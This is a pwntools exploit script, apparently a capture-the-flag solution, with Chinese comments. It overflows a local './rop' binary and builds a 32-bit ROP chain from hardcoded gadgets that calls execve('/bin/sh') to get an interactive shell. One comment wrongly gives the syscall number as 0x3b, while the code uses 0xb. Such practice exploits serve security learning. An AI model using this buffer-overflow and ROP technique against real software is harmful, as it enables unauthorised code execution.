#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import *

p = process("./rop")

p.recvuntil("\n")

padding = 112
payload = cyclic(112)

###### 說明 #####
# 基本上 EIP 由我們控制後，我們會想要執行 execve("/bin/sh", NULL, NULL)
# "/bin/sh\x00" 在程式中已經幫我們寫好，所以我們不用另外找地址塞 "/bin/sh\x00"，只需要讓 ebx 的值為 "/bin/sh\x00" 的所在位置
# 接下來就分別把 eax = 0x3b
#                ecx = 0
#                edx = 0
#                int 0x80
################

# Gadget
binsh = 0x80be408
pop_eax = 0x080bb196
pop_ebx = 0x080481c9
pop_edx_ecx_ebx = 0x0806eb90 # for pop_ecx
pop_edx = 0x0806eb6a
int_0x80 = 0x08049421


# payload 結構：
# ecx = 0 -> ebx = binsh -> eax = 0xb -> edx = 0 -> int 0x80
payload += flat([pop_edx_ecx_ebx, 0, 0, 0, pop_ebx, binsh, pop_eax, 0xb, pop_edx, 0, int_0x80])

p.sendline(payload)
p.interactive()

